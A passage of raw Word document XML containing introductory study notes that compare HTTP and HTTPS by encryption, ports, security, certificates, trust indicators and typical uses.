      </w:tr>
      <w:tr w:rsidR="00617E2C" w:rsidRPr="00617E2C" w14:paraId="5191D753" w14:textId="77777777" w:rsidTr="00574FE8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="798909BA"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Encryption</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="19471BC9"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No encryption (plain text)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5801A132"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Data is encrypted (using SSL/TLS)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00617E2C" w:rsidRPr="00617E2C" w14:paraId="6B30AFF3" w14:textId="77777777" w:rsidTr="00574FE8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="62FE7506"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ecurity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="56DC5A45"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No security</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5E7FE2E7"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ecures data and ensures authenticity</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00617E2C" w:rsidRPr="00617E2C" w14:paraId="5459CFAD" w14:textId="77777777" w:rsidTr="00574FE8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="45DAFD08"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ertificate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7D29EA34"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No certificate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4C0AC5F9"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Uses digital certificates for validation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00617E2C" w:rsidRPr="00617E2C" w14:paraId="5256A01C" w14:textId="77777777" w:rsidTr="00574FE8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1481011C"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Trust</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="341439CF"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Not trusted</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="06FA7B3E"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rusted with a padlock symbol in the browser</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="604940EA" w14:textId="77777777" w:rsidR="00574FE8" w:rsidRPr="00617E2C" w:rsidRDefault="00574FE8"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When to Use HTTPS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754C3CAD"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ny website that handles sensitive data</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, such as login credentials, payment information, or personal details.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C0B9BA"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E-commerce sites</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>social media platforms</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>banking applications</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A1D83B"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Google and other search engines also recommend HTTPS for all websites, not just those dealing with sensitive information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF12A19" w14:textId="77777777" w:rsidR="00574FE8" w:rsidRPr="00617E2C" w:rsidRDefault="00574FE8"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In conclusion, </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>HTTPS</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ensures a secure, encrypted connection for all types of data transfers, especially for transactions that involve sensitive information. It’s essential for protecting users' privacy and trust on the web.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="351F0606" w14:textId="576E3D89" w:rsidR="00B66F22" w:rsidRPr="00CE4B95"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12581019">
          <v:rect id="_x0000_i3645" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="41ED76CB" w14:textId="73FD1861" w:rsidR="00B5508A" w:rsidRPr="00CE4B95" w:rsidRDefault="009F344F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="904" w:name="_Toc196308384"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Difference between http and https</w:t>
      </w:r>
      <w:r w:rsidR="00B5508A" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="904"/>
    </w:p>
    <w:p w14:paraId="02C712CA" w14:textId="424A27E0" w:rsidR="001D4AC3" w:rsidRPr="00617E2C" w:rsidRDefault="001D4AC3" w:rsidP="00617E2C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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The main difference between </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>HTTPS</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> lies in security and encryption:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A287167" w14:textId="77777777" w:rsidR="001D4AC3" w:rsidRPr="00617E2C" w:rsidRDefault="001D4AC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HTTP (Hypertext Transfer Protocol):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9358B9"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rotocol</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: HTTP is a protocol used for transferring data over the web. It is a standard communication protocol used by browsers to retrieve information from websites.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BBFA15F"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ort</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: HTTP uses port 80 by default for communication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="319EB691"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Encryption</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: HTTP does not provide any encryption for data being transferred between the client and the server. The data is sent in plain text.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30CEB8A9"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ecurity</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: HTTP is not secure and can be vulnerable to attacks like man-in-the-middle (MITM) attacks, where an attacker can intercept and manipulate the data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058EF906"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Use</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: HTTP is typically used for websites that do not involve sensitive transactions, such as blogs or informational websites.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F4158C" w14:textId="77777777" w:rsidR="001D4AC3" w:rsidRPr="00617E2C" w:rsidRDefault="001D4AC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HTTPS (Hypertext Transfer Protocol Secure):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26EB88CF"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lastRenderedPageBreak/>
        <w:t>Protocol</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: HTTPS is an extension of HTTP that adds security by using </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SSL/TLS</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Secure Sockets Layer/Transport Layer Security) to encrypt the communication between the client and the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34EC24B9"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ort</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: HTTPS uses port 443 by default for secure communication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62499789"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Encryption</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: HTTPS encrypts the data, making it unreadable to anyone who might intercept the communication. It uses SSL/TLS protocols to ensure that the data is securely transmitted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C4743CD"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ecurity</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: HTTPS is secure and protects against attacks like MITM. It also provides </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>data integrity</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>authentication</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1500F1EE"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Use</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: HTTPS is used for websites that handle sensitive data such as online banking, e-commerce transactions, login forms, and other types of private information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="604E04DC" w14:textId="77777777" w:rsidR="001D4AC3" w:rsidRPr="00617E2C" w:rsidRDefault="001D4AC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Key Differences Between HTTP and HTTP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8"/>
        <w:gridCol w:w="3212"/>
        <w:gridCol w:w="5215"/>
      </w:tblGrid>
      <w:tr w:rsidR="00617E2C" w:rsidRPr="00617E2C" w14:paraId="64DAC275" w14:textId="77777777" w:rsidTr="001D4AC3">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2C1D5E1D" w14:textId="77777777" w:rsidR="001D4AC3" w:rsidRPr="00617E2C" w:rsidRDefault="001D4AC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Feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7DB0517A" w14:textId="77777777" w:rsidR="001D4AC3" w:rsidRPr="00617E2C" w:rsidRDefault="001D4AC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HTTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7032B871" w14:textId="77777777" w:rsidR="001D4AC3" w:rsidRPr="00617E2C" w:rsidRDefault="001D4AC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HTTPS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00617E2C" w:rsidRPr="00617E2C" w14:paraId="78D29A59" w14:textId="77777777" w:rsidTr="001D4AC3">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3762E2A3"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ecurity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="679D62C6"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No encryption, data is in plain text</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1BE344C9"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Uses SSL/TLS to encrypt data</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00617E2C" w:rsidRPr="00617E2C" w14:paraId="3A76900E" w14:textId="77777777" w:rsidTr="001D4AC3">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4278458A"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ort</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1B1086B1"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Port 80</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="640BF9AF"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Port 443</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00617E2C" w:rsidRPr="00617E2C" w14:paraId="625502BE" w14:textId="77777777" w:rsidTr="001D4AC3">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="71814EFC"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erformance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="08C01AF4"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lightly faster due to no encryption</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4CD6AA6D"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lightly slower due to encryption overhead</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00617E2C" w:rsidRPr="00617E2C" w14:paraId="75F3D15F" w14:textId="77777777" w:rsidTr="001D4AC3">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7257297B"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Data Integrity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="14DF5A8F"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No guarantee of data integrity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="57A1D1A0"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Guarantees data integrity and prevents data modification</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00617E2C" w:rsidRPr="00617E2C" w14:paraId="5B36E10D" w14:textId="77777777" w:rsidTr="001D4AC3">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="25B41915"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uthentication</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0932FFF1"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No authentication</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="049174B4"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Provides authentication through SSL/TLS certificates</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00617E2C" w:rsidRPr="00617E2C" w14:paraId="1893DDA5" w14:textId="77777777" w:rsidTr="001D4AC3">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="63648A62"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SEO</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="231DC990"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Does not contribute to SEO ranking</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="48CA6BBC"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Google gives ranking boost for HTTPS sites</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00617E2C" w:rsidRPr="00617E2C" w14:paraId="1952343F" w14:textId="77777777" w:rsidTr="001D4AC3">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7BAACE51"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Trust</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="62B9EF49"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No indication of trust</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="121DB916"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Padlock icon or "Secure" label in the browser</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="01AB11A8" w14:textId="77777777" w:rsidR="001D4AC3" w:rsidRPr="00617E2C" w:rsidRDefault="001D4AC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When to Use HTTPS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD1196C"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For websites handling sensitive data like login credentials, payment details, or personal information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C91156"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For e-commerce, banking, and online services that require a secure environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56AAFD90"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It is increasingly becoming a best practice for </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>all</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
